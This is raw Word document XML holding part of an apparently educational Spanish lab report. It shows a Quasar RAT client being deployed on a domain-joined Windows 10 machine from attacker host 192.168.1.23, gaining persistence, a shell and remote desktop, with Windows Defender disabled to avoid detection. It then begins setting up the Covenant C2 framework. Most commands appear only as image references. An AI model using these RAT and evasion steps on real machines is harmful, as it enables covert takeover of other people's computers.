                    <a:blip r:embed="rId249">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5076190" cy="4266667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3409BE17" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBCE571" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Nos dirá donde lo queremos guardar en este caso en el Escritorio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4838EF" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314536B3" w14:textId="47502C38" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69BD4D36" wp14:editId="66EA95C4">
            <wp:extent cx="5400040" cy="4111625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="777151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51808" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId250">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="4111625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E4364C" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6765BAD1" w14:textId="3A6AEAD5" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora ejecutaremos el cliente de </w:t>
      </w:r>
      <w:r w:rsidR="000F35DB">
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>uasar en la máquina Windows 10 unida al dominio google.local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BCC170" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1855B38A" w14:textId="00850F88" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para eso crearé un servidor web con Python, para acceder al cliente de </w:t>
      </w:r>
      <w:r w:rsidR="000F35DB">
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>uasar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D08171" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD01D36" w14:textId="19FD5A51" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="277E83A9" wp14:editId="7EB4C2B8">
            <wp:extent cx="5400040" cy="309880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1837384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4226" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId251" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="309880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B4585" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140AEAC2" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>La IP de esta máquina atacante es 192.168.1.23.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DCDE49" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114846C7" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Consiguiendo la conexión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7A8750" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00EF0863"/>
    <w:p w14:paraId="23BD9FDE" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00EF0863"/>
    <w:p w14:paraId="7D49A740" w14:textId="679AB389" w:rsidR="0055211F" w:rsidRDefault="00530607" w:rsidP="00EF0863">
      <w:r w:rsidRPr="00747216">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34E682FC" wp14:editId="0A3BCCD3">
            <wp:extent cx="5400040" cy="2761615"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1030450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0044" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId252">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2761615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A4C78E" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00EF0863"/>
    <w:p w14:paraId="6326A69D" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Además al iniciar el sistema en esta ruta “</w:t>
      </w:r>
      <w:r w:rsidRPr="00747216">
        <w:t>C:\Users\Alesander\AppData\Roaming\SubDir\Client.exe</w:t>
      </w:r>
      <w:r>
        <w:t>”, tenemos este cliente que se ejecutará logrando la persistencia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC8B197" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="51A863D5" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="69F20CE0" w14:textId="05E4EE08" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A8C57AA" wp14:editId="335B28E7">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="443658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58688" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId253"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1A892EE4" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="1AEC4748" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Podemos ver la información del sistema comprometido:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057085D3" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="1ED8C910" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="4800C837" w14:textId="3B3DE588" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42B93597" wp14:editId="1E95A6A8">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61248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8911" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId254"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4D9A6F6" w14:textId="77777777" w:rsidR="003927F1" w:rsidRDefault="003927F1" w:rsidP="0055211F"/>
    <w:p w14:paraId="26BA8683" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Hacer una Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C69E79" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="5DECF7A1" w14:textId="66E4B626" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F2CC7C3" wp14:editId="240D6323">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54535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5316" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId255"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D6B916F" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="49B8E6EF" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Activar el escritorio remoto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C0A13" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="3714B9F3" w14:textId="312E5F91" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B1511AB" wp14:editId="6BBB9283">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27160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165" name=""/>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851680E" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="55F71153" w14:textId="02606DEE" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ejecutar programas remotos, en esta caso ejecuto uno que sirve para ofuscar IPs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196BB599" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="452CF5BA" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="4F602D44" w14:textId="37B569B0" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45A45290" wp14:editId="2161FED3">
            <wp:extent cx="5400040" cy="2754630"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="870908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8792" name=""/>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5400040" cy="2754630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF8C11" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="3C3CAFBB" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Apagar el equipo, reiniciarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2E75C4" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y todo se gestionar desde Administration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3AC24B" w14:textId="5DD29F32" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74322E1B" wp14:editId="1BCFBBF1">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="822526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6063" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId258"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4225428B" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="2305755C" w14:textId="23740910" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para este ejemplo desactive el Windows Defender pues detecta esto como un troyano.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396F144" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="6078F217" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="0055211F"/>
    <w:p w14:paraId="527DF13C" w14:textId="77777777" w:rsidR="0055211F" w:rsidRDefault="0055211F" w:rsidP="00EF0863"/>
    <w:p w14:paraId="6E31C22B" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A7CDE0" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0931E08D" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CE2D8B" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D3C1BC" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1E7498" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F12CD56" w14:textId="7DDA8841" w:rsidR="007B3349" w:rsidRDefault="00B10908" w:rsidP="00F95C4F">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc135575997"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidR="007B3349">
        <w:t>I+D+I Covenenant:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="69F49C4A" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="00ED3279"/>
    <w:p w14:paraId="2D3F30AC" w14:textId="752A2D3B" w:rsidR="00ED3279" w:rsidRPr="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="00ED3279">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc135575998"/>
      <w:r>
        <w:t>Configuración:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="14A5FA55" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="007B3349"/>
    <w:p w14:paraId="6FE725C0" w14:textId="29F8D4A5" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Primero necesitamos instalar Covenant en una </w:t>
      </w:r>
      <w:r w:rsidR="00822F42">
        <w:t>máquina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> anfitriona que funcionará tanto como base de datos para Covenant como la aplicación de administración que controla los agentes de la aplicación conocidos como grunts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA0A703" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1105C843" w14:textId="444D25D4" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Las siguientes aplicaciones deben estar instaladas en la máquina donde se aloja Covenant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C485E1" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3B1964" w14:textId="2582B13A" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218FB0ED" w14:textId="0322A777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SDK de .NET Core 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF8958" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0916BFB4" w14:textId="5046F2B6" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Partimos de </w:t>
      </w:r>
      <w:r w:rsidR="007060C7">
        <w:t>que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidR="007060C7">
        <w:t>nuestra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007060C7">
        <w:t>máquina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> atacante tenemos git instalado, pero en el caso de que no estuviera solo tendríamos que escribir ‘sudo apt install git’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C513D4B" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8B580A" w14:textId="34442C61" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En la documentación de Microsoft: </w:t>
      </w:r>
      <w:hyperlink r:id="rId259" w:anchor="scripted-install" w:history="1">
        <w:r w:rsidRPr="00143090">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://learn.microsoft.com/es-es/dotnet/core/install/linux-scripted-manual#scripted-install</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="644844CA" w14:textId="77777777" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49419D8E" w14:textId="36D441F4" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Encontramos un script de bash para instalarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD7C76E" w14:textId="77777777" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B30898" w14:textId="3035EFAD" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Descargaremos el script con el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12250357" w14:textId="77777777" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A0E594" w14:textId="1E903CD6" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E7AA0BB" wp14:editId="774587C2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="80010"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="38826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35940FFF" w14:textId="58D480F5" w:rsidR="002817AC" w:rsidRDefault="002817AC">
                            <w:r w:rsidRPr="002817AC">
                              <w:t>wget https://dot.net/v1/dotnet-install.sh -O dotnet-install.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7AA0BB" id="_x0000_s1058" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2516920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&#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FTD7Dq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35940FFF" w14:textId="58D480F5" w:rsidR="002817AC" w:rsidRDefault="002817AC">
                      <w:r w:rsidRPr="002817AC">
                        <w:t>wget https://dot.net/v1/dotnet-install.sh -O dotnet-install.sh</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE0BAA9" w14:textId="77777777" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747B19F4" w14:textId="77777777" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6E3264" w14:textId="77777777" w:rsidR="00F525FE" w:rsidRDefault="00F525FE" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516E4676" w14:textId="77777777" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11506851" w14:textId="56FE9727" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le daremos permisos para ejecutarlo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261BBAF3" w14:textId="77777777" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727738FD" w14:textId="5FC82CDA" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
